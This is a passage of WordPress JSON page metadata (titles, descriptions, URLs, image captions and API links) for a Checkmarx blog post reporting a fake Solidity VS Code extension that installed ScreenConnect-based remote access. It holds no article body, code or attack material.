ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. 
IoCs + mitigation.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","og_locale":"en_US","og_type":"article","og_title":"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx","og_description":"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. IoCs + mitigation.","og_url":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","og_site_name":"Checkmarx","article_publisher":"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","article_modified_time":"2026-02-02T09:59:42+00:00","og_image":[{"width":2560,"height":1280,"url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp","type":"image\/webp"}],"twitter_card":"summary_large_image","twitter_site":"@checkmarx","twitter_misc":{"Est. 
reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","url":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","name":"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx","isPartOf":{"@id":"https:\/\/checkmarx.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage"},"image":{"@id":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage"},"thumbnailUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp","datePublished":"2026-01-29T22:01:00+00:00","dateModified":"2026-02-02T09:59:42+00:00","description":"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. 
IoCs + mitigation.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp","width":2560,"height":1280,"caption":"a developer at a workstation is tugged by puppet strings from a large ghostly hand above, while a VS Code extensions screen shows \u201cSolidity\u201d and a \u201cScreenConnect\u201d tag, suggesting a compromised dev setup."},{"@type":"WebSite","@id":"https:\/\/checkmarx.com\/#website","url":"https:\/\/checkmarx.com\/","name":"Checkmarx","description":"The world runs on code. 
We secure it.","publisher":{"@id":"https:\/\/checkmarx.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/checkmarx.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/checkmarx.com\/#organization","name":"Checkmarx","url":"https:\/\/checkmarx.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","width":1,"height":1,"caption":"Checkmarx"},"image":{"@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","https:\/\/x.com\/checkmarx","https:\/\/www.youtube.com\/user\/CheckmarxResearchLab","https:\/\/www.linkedin.com\/company\/checkmarx"]}]}},"_links":{"self":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post\/106616","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post"}],"about":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/types\/zero-post"}],"author":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/users\/164"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media\/106624"}],"wp:attachment":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media?parent=106616"}],"wp:term":[{"taxonomy":"zero-category","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-category?post=106616"},{"taxonomy":"zero-tag","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-tag?post=106616"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}